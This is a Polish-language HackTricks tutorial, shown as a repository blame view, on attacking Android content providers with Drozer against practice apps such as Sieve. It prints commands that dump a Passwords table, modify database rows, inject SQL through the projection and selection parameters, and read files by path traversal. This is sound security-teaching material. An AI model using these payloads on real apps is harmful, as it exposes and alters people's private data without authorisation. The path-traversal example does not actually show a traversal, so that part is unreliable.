hacktricks/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md

241 lines
13 KiB
Markdown
Raw Normal View History

2024-02-11 01:46:25 +00:00
# Wykorzystywanie dostawców treści
2022-04-28 16:01:33 +00:00
2024-02-11 01:46:25 +00:00
## Wykorzystywanie dostawców treści
2022-05-01 13:25:53 +00:00
2022-04-28 16:01:33 +00:00
<details>
2024-02-11 01:46:25 +00:00
<summary><strong>Dowiedz się, jak hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-11 01:46:25 +00:00
Inne sposoby wsparcia HackTricks:
2024-01-03 10:43:38 +00:00
2024-02-11 01:46:25 +00:00
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLAN SUBSKRYPCJI**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-04-28 16:01:33 +00:00
</details>
2024-02-11 01:46:25 +00:00
## Wprowadzenie
2024-02-11 01:46:25 +00:00
Dane są **dostarczane z jednej aplikacji do innych** na żądanie za pomocą komponentu znanego jako **dostawca treści**. Te żądania są obsługiwane za pomocą metod klasy **ContentResolver**. Dostawcy treści mogą przechowywać swoje dane w różnych lokalizacjach, takich jak **baza danych**, **pliki** lub przez **sieć**.
2024-02-11 01:46:25 +00:00
W pliku _Manifest.xml_ konieczne jest zadeklarowanie dostawcy treści. Na przykład:
2024-02-08 03:08:28 +00:00
```xml
<provider android:name=".DBContentProvider" android:exported="true" android:multiprocess="true" android:authorities="com.mwr.example.sieve.DBContentProvider">
2024-02-11 01:46:25 +00:00
<path-permission android:readPermission="com.mwr.example.sieve.READ_KEYS" android:writePermission="com.mwr.example.sieve.WRITE_KEYS" android:path="/Keys"/>
</provider>
```
2024-02-11 01:46:25 +00:00
Aby uzyskać dostęp do `content://com.mwr.example.sieve.DBContentProvider/Keys`, wymagane jest uprawnienie `READ_KEYS`. Ciekawym jest, że ścieżka `/Keys/` jest dostępna w następującym fragmencie, który nie jest chroniony z powodu błędu programisty, który zabezpieczył `/Keys`, ale zadeklarował `/Keys/`.
**Możliwe jest uzyskanie dostępu do prywatnych danych lub wykorzystanie podatności (wstrzyknięcie SQL lub przechodzenie po ścieżkach).**
## Uzyskaj informacje z **publicznych dostawców treści**
```
dz> run app.provider.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
Authority: com.mwr.example.sieve.DBContentProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.DBContentProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
Path Permissions:
Path: /Keys
Type: PATTERN_LITERAL
Read Permission: com.mwr.example.sieve.READ_KEYS
Write Permission: com.mwr.example.sieve.WRITE_KEYS
Authority: com.mwr.example.sieve.FileBackupProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.FileBackupProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
```
Możliwe jest złożenie w całość sposobu dotarcia do **DBContentProvider** poprzez rozpoczęcie URI od "_content://_". Ten podejście opiera się na wskazówkach uzyskanych dzięki użyciu Drozera, gdzie kluczowe informacje zostały znalezione w katalogu _/Keys_.
Drozer może **próbować zgadywać i testować kilka URI**:
```
dz> run scanner.provider.finduris -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/
2024-02-11 01:46:25 +00:00
...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/Keys
Accessible content URIs:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
```
2024-02-11 01:46:25 +00:00
Należy również sprawdzić kod **ContentProvidera**, aby wyszukać zapytania:
![](<../../../.gitbook/assets/image (121) (1) (1) (1).png>)
2024-02-11 01:46:25 +00:00
Jeśli nie można znaleźć pełnych zapytań, można **sprawdzić, jakie nazwy są deklarowane przez ContentProvider** w metodzie `onCreate`:
![](<../../../.gitbook/assets/image (186).png>)
2024-02-11 01:46:25 +00:00
Zapytanie będzie wyglądać tak: `content://nazwa.pakietu.klasy/nazwa_zadeklarowana`
2024-02-11 01:46:25 +00:00
## **Content Providery oparte na bazie danych**
2024-02-11 01:46:25 +00:00
Prawdopodobnie większość Content Providerów jest używana jako **interfejs** dla **bazy danych**. Dlatego, jeśli uzyskasz do niej dostęp, będziesz w stanie **wydobywać, aktualizować, wstawiać i usuwać** informacje.\
Sprawdź, czy można **uzyskać dostęp do wrażliwych informacji** lub spróbuj je zmienić, aby **obejść mechanizmy autoryzacji**.
2024-02-11 01:46:25 +00:00
Podczas sprawdzania kodu Content Providera, **sprawdź** również funkcje o nazwach: _query, insert, update i delete_:
![](<../../../.gitbook/assets/image (187).png>)
![](<../../../.gitbook/assets/image (254) (1) (1) (1) (1) (1) (1) (1).png>)
2024-02-11 01:46:25 +00:00
Ponieważ będziesz w stanie je wywołać.
2024-02-11 01:46:25 +00:00
### Zapytanie o zawartość
```
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
_id: 1
service: Email
username: incognitoguy50
password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w==
-
email: incognitoguy50@gmail.com
```
2024-02-11 01:46:25 +00:00
### Wstawianie treści
2024-02-11 01:46:25 +00:00
Przeszukując bazę danych dowiesz się **nazw kolumn**, a następnie będziesz mógł wstawić dane do bazy:
2022-10-22 15:26:54 +00:00
![](<../../../.gitbook/assets/image (188) (1).png>)
2022-10-22 15:26:54 +00:00
![](<../../../.gitbook/assets/image (189) (1).png>)
2024-02-11 01:46:25 +00:00
_Zauważ, że podczas wstawiania i aktualizacji możesz użyć --string, aby wskazać ciąg znaków, --double, aby wskazać liczbę zmiennoprzecinkową, --float, --integer, --long, --short, --boolean._
2024-02-11 01:46:25 +00:00
### Aktualizowanie treści
2024-02-11 01:46:25 +00:00
Znając nazwy kolumn, możesz również **modyfikować wpisy**:
![](<../../../.gitbook/assets/image (190).png>)
2024-02-11 01:46:25 +00:00
### Usuwanie treści
![](<../../../.gitbook/assets/image (191).png>)
2022-05-01 13:25:53 +00:00
### **SQL Injection**
2024-02-11 01:46:25 +00:00
Łatwo przetestować podatność na SQL Injection **(SQLite)**, manipulując polami **projekcji** i **selekcji**, które są przekazywane do dostawcy treści.\
Podczas przeszukiwania dostawcy treści istnieją 2 interesujące argumenty do wyszukiwania informacji: _--selection_ i _--projection_:
2022-09-30 10:43:59 +00:00
![](<../../../.gitbook/assets/image (192) (1).png>)
2024-02-11 01:46:25 +00:00
Możesz spróbować **wykorzystać** te **parametry** do przetestowania podatności na **SQL injection**:
```
2024-02-11 01:46:25 +00:00
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
```
```
2024-02-11 01:46:25 +00:00
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "*
FROM SQLITE_MASTER WHERE type='table';--"
| type | name | tbl_name | rootpage | sql |
2024-02-11 01:46:25 +00:00
| table | android_metadata | android_metadata | 3 | CREATE TABLE ... |
| table | Passwords | Passwords | 4 | CREATE TABLE ... |
```
2024-02-11 01:46:25 +00:00
**Automatyczne odkrywanie SQLInjection za pomocą Drozera**
Drozer is a powerful security testing framework for Android applications. It provides a wide range of features to assist in the penetration testing of Android apps. One of its notable features is the ability to automatically discover SQL injection vulnerabilities in Android apps.
Drozer uses a technique called content provider injection to identify potential SQL injection points in an app. Content providers are components in Android apps that allow data to be shared between different apps. By injecting malicious SQL queries into content provider URIs, Drozer can determine if the app is vulnerable to SQL injection attacks.
To perform automatic SQL injection discovery with Drozer, follow these steps:
2024-02-11 01:46:25 +00:00
1. Install Drozer on your testing machine.
2. Connect your Android device to the testing machine using ADB.
3. Launch Drozer and start a session with the target app using the `drozer console connect` command.
4. Use the `run app.provider.finduris` command to identify the content provider URIs in the app.
5. Use the `run app.provider.query` command to inject SQL queries into the content provider URIs and check for potential SQL injection vulnerabilities.
6. Analyze the results and identify any vulnerable points in the app's content providers.
2024-02-11 01:46:25 +00:00
By automating the SQL injection discovery process, Drozer can save time and effort during the penetration testing of Android apps. However, it is important to note that this technique should only be used on apps that you have permission to test, as it can potentially cause data loss or other adverse effects if used maliciously.
```
2024-02-11 01:46:25 +00:00
dz> run scanner.provider.injection -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Injection in Projection:
2024-02-11 01:46:25 +00:00
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
Injection in Selection:
2024-02-11 01:46:25 +00:00
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
dz> run scanner.provider.sqltables -a jakhar.aseem.diva
Scanning jakhar.aseem.diva...
Accessible tables for uri content://jakhar.aseem.diva.provider.notesprovider/notes/:
2024-02-11 01:46:25 +00:00
android_metadata
notes
sqlite_sequence
```
2024-02-11 01:46:25 +00:00
## **Dostawcy treści oparte na systemie plików**
2024-02-11 01:46:25 +00:00
Dostawcy treści mogą również być używani do **dostępu do plików:**
![](<../../../.gitbook/assets/image (193).png>)
2024-02-11 01:46:25 +00:00
### Odczytaj **plik**
2024-02-11 01:46:25 +00:00
Możesz odczytywać pliki z dostawcy treści
```
2024-02-11 01:46:25 +00:00
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1 localhost
```
2024-02-11 01:46:25 +00:00
### **Przechodzenie po ścieżce**
2024-02-11 01:46:25 +00:00
Jeśli masz dostęp do plików, możesz spróbować wykorzystać przechodzenie po ścieżce (w tym przypadku nie jest to konieczne, ale możesz spróbować użyć "_../_" i podobnych sztuczek).
```
2024-02-11 01:46:25 +00:00
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1 localhost
```
2024-02-11 01:46:25 +00:00
**Automatyczne odkrywanie Path Traversal za pomocą Drozera**
Drozer is a powerful Android security testing framework that allows you to perform various security assessments on Android applications. One of the techniques it supports is the automatic discovery of Path Traversal vulnerabilities in Android applications.
Drozer uses a combination of static and dynamic analysis to identify potential Path Traversal vulnerabilities. It analyzes the application's code and behavior to determine if it is susceptible to this type of attack.
2024-02-11 01:46:25 +00:00
To use Drozer for automatic Path Traversal discovery, follow these steps:
2024-02-11 01:46:25 +00:00
1. Install Drozer on your testing machine.
2. Connect your Android device to the testing machine using ADB.
3. Launch Drozer and start a session with the target application.
4. Use the `run app.provider.find` command to search for content providers in the target application.
5. Use the `run app.provider.query` command to query each content provider for potential Path Traversal vulnerabilities.
6. Analyze the results and identify any potential vulnerabilities.
Drozer will automatically analyze the content providers in the target application and check if they are vulnerable to Path Traversal attacks. It will provide you with a detailed report of any potential vulnerabilities found.
By using Drozer's automatic Path Traversal discovery feature, you can quickly identify and assess the security of Android applications. This can help you uncover potential vulnerabilities and take appropriate measures to mitigate them.
```
2024-02-11 01:46:25 +00:00
dz> run scanner.provider.traversal -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Vulnerable Providers:
2024-02-11 01:46:25 +00:00
content://com.mwr.example.sieve.FileBackupProvider/
content://com.mwr.example.sieve.FileBackupProvider
```
2024-02-11 01:46:25 +00:00
## Odwołania
2021-11-30 16:46:07 +00:00
* [https://www.tutorialspoint.com/android/android\_content\_providers.htm](https://www.tutorialspoint.com/android/android\_content\_providers.htm)
* [https://manifestsecurity.com/android-application-security-part-15/](https://manifestsecurity.com/android-application-security-part-15/)
2024-02-08 03:08:28 +00:00
* [https://labs.withsecure.com/content/dam/labs/docs/mwri-drozer-user-guide-2015-03-23.pdf](https://labs.withsecure.com/content/dam/labs/docs/mwri-drozer-user-guide-2015-03-23.pdf)
2022-04-28 16:01:33 +00:00
<details>
2024-02-11 01:46:25 +00:00
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-11 01:46:25 +00:00
Inne sposoby wsparcia HackTricks:
2024-01-03 10:43:38 +00:00
2024-02-11 01:46:25 +00:00
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLAN SUBSKRYPCJI**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-04-28 16:01:33 +00:00
</details>